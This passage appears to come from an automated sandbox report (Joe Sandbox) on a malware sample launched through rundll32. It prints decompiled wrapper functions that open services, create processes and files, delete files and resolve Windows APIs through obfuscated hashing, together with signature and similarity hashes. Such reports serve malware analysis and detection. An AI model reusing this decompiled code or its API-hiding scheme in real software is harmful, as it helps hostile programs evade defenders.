                                                                                                                                    0x002091a8
                                                                                                                                    0x002091af

                                                                                                                                    APIs
                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 002091A8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                    • String ID: WF
                                                                                                                                    • API String ID: 1889721586-2390014890
                                                                                                                                    • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                    • Instruction ID: 9e92c99d2ec2c792fba0d9d77cef1fcc31d9c2b8df609fe1a21bae15fab56b58
                                                                                                                                    • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                    • Instruction Fuzzy Hash: 3F016971911108FBEB14CB95DD4ACEFBFB8EF95714F108099F404A7200D3B15F649AA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002042C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39serviceCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 255 2042c4-204345 call 2120b9 call 21aa30 OpenServiceW
                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E002042C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002120B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E0021AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}








                                                                                                                                    0x002042c7
                                                                                                                                    0x002042c8
                                                                                                                                    0x002042ca
                                                                                                                                    0x002042cd
                                                                                                                                    0x002042cf
                                                                                                                                    0x002042d2
                                                                                                                                    0x002042d5
                                                                                                                                    0x002042d8
                                                                                                                                    0x002042db
                                                                                                                                    0x002042dc
                                                                                                                                    0x002042dd
                                                                                                                                    0x002042e2
                                                                                                                                    0x002042ec
                                                                                                                                    0x002042f5
                                                                                                                                    0x002042fc
                                                                                                                                    0x00204303
                                                                                                                                    0x0020430a
                                                                                                                                    0x00204311
                                                                                                                                    0x00204318
                                                                                                                                    0x00204330
                                                                                                                                    0x0020433f
                                                                                                                                    0x00204345

                                                                                                                                    APIs
                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00214A8F,?,?,2635DC09), ref: 0020433F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: OpenService
                                                                                                                                    • String ID: X%v
                                                                                                                                    • API String ID: 3098006287-3430654708
                                                                                                                                    • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                    • Instruction ID: ef2c10c397b5e6a84589cf50b26f333a963e5876b9c25c50bb5724e8bbe8e8ac
                                                                                                                                    • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                    • Instruction Fuzzy Hash: 520104B681120CFBDF15DFD4D9468DEBF79EF14314F148188F90562221E2729B609B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00208F65 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 260 208f65-209010 call 2120b9 call 21aa30 CreateFileW
                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                    			E00208F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E0021AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}









                                                                                                                                    0x00208f6d
                                                                                                                                    0x00208f72
                                                                                                                                    0x00208f73
                                                                                                                                    0x00208f76
                                                                                                                                    0x00208f79
                                                                                                                                    0x00208f7c
                                                                                                                                    0x00208f7f
                                                                                                                                    0x00208f80
                                                                                                                                    0x00208f83
                                                                                                                                    0x00208f86
                                                                                                                                    0x00208f8a
                                                                                                                                    0x00208f8b
                                                                                                                                    0x00208f90
                                                                                                                                    0x00208f9f
                                                                                                                                    0x00208faa
                                                                                                                                    0x00208fb1
                                                                                                                                    0x00208fb2
                                                                                                                                    0x00208fb9
                                                                                                                                    0x00208fc0
                                                                                                                                    0x00208fc7
                                                                                                                                    0x00208fce
                                                                                                                                    0x00208fd5
                                                                                                                                    0x00208fdc
                                                                                                                                    0x00208fe3
                                                                                                                                    0x00208ff0
                                                                                                                                    0x00209009
                                                                                                                                    0x00209010

                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00209009
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                    • Instruction ID: 986cf4d4ade6bb8369047f35c169b22fdbcd96e197a702d8f2d42932fc43d8ab
                                                                                                                                    • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                    • Instruction Fuzzy Hash: 59111672901219FBCF219FA9DD098DFBFB6EF58354F118188F90862121D3328A65EB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00207F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 265 207f5d-207ff1 call 2120b9 call 21aa30 CreateProcessW
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0020AD99,?,?,?,181C8C04,0020AD99), ref: 00207FEB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                    • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction ID: 71e710dab8cd55bcd52c1916bdd9d62a8592644ee3d50f81e78666b11d2994ef
                                                                                                                                    • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                    • Instruction Fuzzy Hash: DC11D672402118BBDF619F91DD09CDF7FB9EF193A4F145144F91921121D2728AA0EBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00204DDD Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 270 204ddd-204e73 call 2120b9 call 21aa30 SHFileOperationW
                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                    			E00204DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E002120B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E0021AA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}













                                                                                                                                    0x00204de4
                                                                                                                                    0x00204de7
                                                                                                                                    0x00204de9
                                                                                                                                    0x00204dec
                                                                                                                                    0x00204def
                                                                                                                                    0x00204df1
                                                                                                                                    0x00204df6
                                                                                                                                    0x00204dfd
                                                                                                                                    0x00204e06
                                                                                                                                    0x00204e0d
                                                                                                                                    0x00204e14
                                                                                                                                    0x00204e21
                                                                                                                                    0x00204e22
                                                                                                                                    0x00204e27
                                                                                                                                    0x00204e28
                                                                                                                                    0x00204e2b
                                                                                                                                    0x00204e32
                                                                                                                                    0x00204e39
                                                                                                                                    0x00204e45
                                                                                                                                    0x00204e4a
                                                                                                                                    0x00204e4d
                                                                                                                                    0x00204e54
                                                                                                                                    0x00204e63
                                                                                                                                    0x00204e64
                                                                                                                                    0x00204e6d
                                                                                                                                    0x00204e73

                                                                                                                                    APIs
                                                                                                                                    • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00204E6D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileOperation
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3080627654-0
                                                                                                                                    • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                    • Instruction ID: 526faa5727a33fffe157683532dded3d7e9f778e117eab8b91519380d2aa50f9
                                                                                                                                    • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                    • Instruction Fuzzy Hash: B60139B5E01209FBCB14EFA4D9469DEBFB4EF44314F10C088E904A6251D3744B549B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00205DDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00205DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E002120B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E0021AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}












                                                                                                                                    0x00205de9
                                                                                                                                    0x00205deb
                                                                                                                                    0x00205dfa
                                                                                                                                    0x00205dff
                                                                                                                                    0x00205e09
                                                                                                                                    0x00205e15
                                                                                                                                    0x00205e1c
                                                                                                                                    0x00205e23
                                                                                                                                    0x00205e27
                                                                                                                                    0x00205e2b
                                                                                                                                    0x00205e32
                                                                                                                                    0x00205e4a
                                                                                                                                    0x00205e58
                                                                                                                                    0x00205e5f

                                                                                                                                    APIs
                                                                                                                                    • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00205E58
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileHandleInformation
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3935143524-0
                                                                                                                                    • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                    • Instruction ID: 55ad50b38917fc216786ef678d8ce6647231d0161cf1b8246567bb835d613b51
                                                                                                                                    • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                    • Instruction Fuzzy Hash: A401BC76941208BBDB24DE90CC0AEEEBFB4EF55314F108088F50466250E3B05B609BA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00201E22 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 280 201e22-201ea6 call 2120b9 call 21aa30 RtlAllocateHeap
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00201E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E0021AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}









                                                                                                                                    0x00201e25
                                                                                                                                    0x00201e26
                                                                                                                                    0x00201e28
                                                                                                                                    0x00201e2b
                                                                                                                                    0x00201e2d
                                                                                                                                    0x00201e30
                                                                                                                                    0x00201e33
                                                                                                                                    0x00201e37
                                                                                                                                    0x00201e38
                                                                                                                                    0x00201e3d
                                                                                                                                    0x00201e47
                                                                                                                                    0x00201e50
                                                                                                                                    0x00201e57
                                                                                                                                    0x00201e5e
                                                                                                                                    0x00201e6a
                                                                                                                                    0x00201e72
                                                                                                                                    0x00201e7a
                                                                                                                                    0x00201e7e
                                                                                                                                    0x00201e91
                                                                                                                                    0x00201ea0
                                                                                                                                    0x00201ea6

                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,002080DB,?,00000000,AF136809), ref: 00201EA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                    • Instruction ID: caf38cf2a2107148930be461896c4af04c477aa7a1505b04b6cb34ee7cfc2e17
                                                                                                                                    • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                    • Instruction Fuzzy Hash: FE014876901108FBEB05DFD4DC0A8DE7BB5EF45354F208089F90856211E7B29F60AB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002146BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 285 2146bb-21473b call 2120b9 call 21aa30 SHGetFolderPathW
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E002146BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E002120B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0021AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                    0x002146d5
                                                                                                                                    0x002146da
                                                                                                                                    0x002146e4
                                                                                                                                    0x002146ec
                                                                                                                                    0x002146f3
                                                                                                                                    0x002146f7
                                                                                                                                    0x002146fe
                                                                                                                                    0x00214705
                                                                                                                                    0x0021470c
                                                                                                                                    0x00214724
                                                                                                                                    0x00214735
                                                                                                                                    0x0021473b

                                                                                                                                    APIs
                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00214735
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FolderPath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                    • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction ID: 1d84fc5648d0791abb321777bca2e6754917587114b5c066f8c489f5b6383f02
                                                                                                                                    • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                    • Instruction Fuzzy Hash: 7F012C75802218BBCF25AFD5DC098DFBFB8EF45394F108145F91826211D2758A60DBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002093ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E002093ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0021AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                    0x002093f3
                                                                                                                                    0x00209405
                                                                                                                                    0x00209411
                                                                                                                                    0x00209412
                                                                                                                                    0x00209413
                                                                                                                                    0x0020941a
                                                                                                                                    0x00209421
                                                                                                                                    0x00209428
                                                                                                                                    0x00209433
                                                                                                                                    0x00209436
                                                                                                                                    0x0020943d
                                                                                                                                    0x00209444
                                                                                                                                    0x00209451
                                                                                                                                    0x0020945b

                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0020945B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction ID: e228a2f23e79f4b2d9532255e0864c5061b82ee38a78e6ff9523081d901c8e49
                                                                                                                                    • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                    • Instruction Fuzzy Hash: 8CF03C71901308FBEB04DBE8DA4699DFBF4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00211F8A Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E00211F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002120B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E0021AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}







                                                                                                                                    0x00211f8d
                                                                                                                                    0x00211f8e
                                                                                                                                    0x00211f8f
                                                                                                                                    0x00211f93
                                                                                                                                    0x00211f94
                                                                                                                                    0x00211f99
                                                                                                                                    0x00211fa3
                                                                                                                                    0x00211faf
                                                                                                                                    0x00211fb6
                                                                                                                                    0x00211fbd
                                                                                                                                    0x00211fc4
                                                                                                                                    0x00211fda
                                                                                                                                    0x00211fdd
                                                                                                                                    0x00211fea
                                                                                                                                    0x00211ff5
                                                                                                                                    0x00211ffa

                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00211FF5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 0000000A.00000002.523256219.0000000000223000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_10_2_200000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                    • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                    • Instruction ID: f2d869842e856bae364c5ca25221bba4536057b0b3dfd06f0dd81e2a69a21b2d
                                                                                                                                    • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                    • Instruction Fuzzy Hash: 99F037B1811208FBDB18EF90D9468EEBFF4EB50304F208299E40466222E3715F989B81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00218F9E Relevance: 1.5, APIs: 1, Instructions: 31serviceCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 55%
